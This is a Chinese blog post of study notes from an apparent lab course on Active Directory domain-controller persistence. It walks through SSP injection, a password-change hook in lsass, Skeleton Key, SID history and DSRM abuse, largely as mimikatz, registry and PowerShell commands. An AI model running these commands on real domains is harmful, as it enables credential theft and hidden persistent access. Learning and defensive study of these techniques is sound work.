141-权限维持&域控后门&SSP&HOOK&DSRM&SID&万能钥匙

最新推荐文章于 2024-09-30 09:25:16 发布
最新推荐文章于 2024-09-30 09:25:16 发布
阅读量916 收藏 13
点赞数 22
分类专栏: # 小迪安全学习笔记 文章标签: 安全 网络安全 web安全 网络 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/141499240
版权

参考 https://www.cnblogs.com/lcxblogs/p/14216525.html

内网域-权限维持-基于验证DLL加载-SSP

方法一:

        但如果域控制器重启,被注入内存的伪造的SSP将会丢失。意思就是重启了下面这个方式就不可以继续使用了

privilege::debug

misc::memssp 记录密码mimikatz 重启失效

在C:\Windows\System32\mimilsa.log 中会记录登录的账号密码

方法二:

        使用此方法即使系统重启,也不会影响到持久化的效果。

1、mimilib.dll 传到目标域控的c:\windows\system32\目录下(dll文件记录密码,放在目录下类似环境变量)

2、修改注册表

查询注册表(这个查询好像没什么意义)

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

修改注册表 如果把前面的那个dll文件改名了这里修改注册表的操作里面也要改名

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

最后在 c:\windows\system32\kiwissp.log 记录账号密码文件

权限维持-基于验证DLL加载-HOOK

项目好像是

GitHub - 3gstudent/Hook-PasswordChangeNotify at d544aa61aa3394c673b63ac0875b71d79f7f09cb

或者

RichChigga/PasswordchangeNotify

方法一

基于本地密码的修改,将修改的密码写在该目录下,当然在编译的过程中也可以更改路径。

也就是对应上面第一个项目的链接

选择sln文件打开

然后修改属性页

然后生成

好吧废了我的版本太高了,将项目升级到我的vs版本又说缺什么MFC,搞不太懂直接看下面那个项目的

第二个项目里面都给你编译好了直接拿着用

powershell Import-Module

.\Invoke-ReflectivePEInjection.ps1

Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass

或把HookPasswordChange.dll放到域控中,下面的脚本包含上面两条命令。

所以直接运行即可

.\HookPasswordChangeNotify.ps1

我这里使用Invoke-ReflectivePEInjection.ps1爆了点错误无法运行。。。

方法二

第二个工具是可以远程发送的命令,也就是如果发生了密码的修改就将密码发送到vps上。这里复现失败。。。

 

内网域-权限维持-基于登录进程劫持-Skeleton Key

又称万能钥匙

1、测试域内某个用户与DC通讯

dir \\owa2010cn-god\c$

2、连接DC后,DC注入lsass进程

net use \owa2010cn-god\ipc$ “Admin12345” /user:god\administrator

mimikatz:

privilege::debug

misc::skeleton

3、重新测试域内某个用户与DC通讯

net use \\owa2010cn-god\ipc$ "mimikatz" /user:god\administrator

dir \\owa2010cn-god\c$

因为Skeleton Key技术是被注入到lsass.exe进程的,所以它只存在内存中,如域控重启,万能密码将失效。

也就是只要服务器不重启就会留下一个mimikatz的万能密码。

内网域-权限维持-基于用户属性修改-SID history

wmic useraccount get sid,name

一般来说值是1000以内的都是有管理员权限的

1、获取某用户SID属性:

powershell

Import-Module ActiveDirectory

Get-ADUser webadmin -Properties sidhistory

2、给予某用户administrator属性:

privilege::debug

sid::patch

sid::add /sam:user3 /new:administrator

未使用mimikatz前user3与域控通信

授予权限后

内网域-权限维持-基于机制账号启用-DSRM

概述:

        DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码。

利用流程:

1.获取dsrm及krbtgt的NTLM hash

privilege::debug

lsadump::lsa /patch /name:krbtgt

token::elevate

lsadump::sam

需要将krbtgt的账号启用😂

2.dsrm&krbtgt&NTLM hash同步

krbtgt在域搭建之后就不能修改了,所以将这个DSRM修改为何krbtgt同步就相当于是一个永久的存在的账户密码

NTDSUTIL:打开ntdsutil

set DSRM password:修改DSRM的密码

sync from domain account krbtgt(域用户名字):使DSRM的密码和指定域用户的密码同步

3、修改dsrm登录方式(0:不可登陆、1:只能本地登陆、2:可以远程登录)

powershell

New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

4.利用PTH传递攻击

privilege::debug

sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5

成功后会弹出cmd的窗口。。。容易被发现

但是可以使用这种方式的pth传递

dreamer292
关注
专栏目录
Adjust&DCM:2021联网电视全方位指南.pdf
08-12
CTV 生态系统的复杂性在于其包含多个参与者,包括广告主、需求方平台(DSP)、供应方平台(SSP)和流媒体平台。 如何购买 CTV 广告 购买 CTV 广告需要了解不同的广告格式和定向选择。常见的广告格式包括视频广告、...
域内权限维持:注入SSP
01-29 608
01、简介 SSP(Security Support Provider)是Windows操作系统安全机制的提供者。简单地说,SSP是个DLL文件,主要用来实现Windows操作系统的身份认证功能。在系统启动时,SSP 将被加载到lsass.exe进程中,攻击者通过自定义恶意的DLL文件,在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。这样,即使用户更...
域内权限维持思路总结
道一安全
08-16 1691
在通过某个漏洞或者通过域用户机器抓取hash等手段拿到域控制器权限后,如果不做权限维持,很有可能因为域管理员将域控的密码修改了或者讲漏洞修复了,导致域控制器权限丢失,导致之前的努力都白费了。
域渗透|域权限维持SSP
weixin_42282189的博客
09-04 1076
域渗透|域权限维持SSP 作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 测试环境 域控服务器:Win-2008DC—10.10.10.30 域:god.com 0x01 前言 SSP即Security Support Provider(安全支持提供者)是一个用于实现身份验证的DLL文件,主要用于Windows操作系统的身份认证功能。 当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统
渗透测试入门7之权限维持
鹿鸣天涯
04-03 1288
渗透测试入门7之权限维持 系统后门 Windows 1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器...
ntds.dit和SSP权限维持
weixin_41082546的博客
08-30 546
Kerberos认证工作原理 https://www.cnblogs.com/huamingao/p/7267423.html 5.获取访问活动目录数据库文件的权限(ntds.dit) 前提条件是获取域控权限: 1.通过备份路径(备份服务器储存,媒体,网络共享) 2 在准备配置成域控的服务器上找 NTDS.dit 文件 3. 有虚拟机的管理权限,就能克隆虚拟的域控并离线获取数据 4. 用 ...
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 ...Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
东方SSP-1调速器说明书
04-18
### 东方SSP-1调速器操作与安全使用指南 #### 一、产品概述 东方SSP-1调速器是一种专为感应电机设计的速度控制器,能够有效地控制电机的转速,适用于多种工业场景。该调速器通过与特定型号的马达以及电容器配合...
CAN-I2S-I2C-SPI-SSP.zip_SSP
09-21
本文将深入探讨五种常见的串行通信协议:CAN(Controller Area Network)、I2S(Inter-IC Sound)、I2C(Inter-Integrated Circuit)、SPI(Serial Peripheral Interface)以及SSP(Serial Synchronous Protocol),...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 632
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 513
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1181
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1287
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1032
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
等保测评:企业数字安全的坚实盾牌
最新发布
w13359990065的博客
09-30 1306
据权威机构统计,未通过等保测评的企业在遭遇网络安全事件时,其数据泄露风险高出已通过企业近30%,这不仅直接威胁到企业的核心资产安全,还可能导致品牌信誉的严重受损。以某知名电商企业为例,因忽视等保测评,其支付系统曾遭受黑客攻击,导致大量用户信息泄露,最终不仅面临巨额罚款,还失去了大量客户的信任,市场份额一落千丈。以某知名电商企业为例,其在一次等保测评中发现,其支付系统存在一处严重的SQL注入漏洞,该漏洞允许攻击者通过构造特定的输入参数,绕过系统验证,直接访问数据库,进而获取敏感信息。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 660
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
sudo 命令:掌握系统权限控制,实现安全高效管理
qq_38641599的博客
09-26 710
​sudo​ 命令允许系统管理员授权普通用户执行特定命令,并以管理员身份运行这些命令,通常需要输入用户自己的密码。​​sudo 全称是"substitute user do",意为“替用户做”,也就是“以另一个用户的身份执行命令”。优点这种机制既提高了系统的安全性,又简化了权限管理。工作原理当用户执行 sudo 命令时,系统会检查/etc/sudoers 文件,该文件定义了哪些用户可以执行哪些命令。如果用户被授权,sudo 会要求他们输入自己的密码,然后执行指定的命令。配置文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值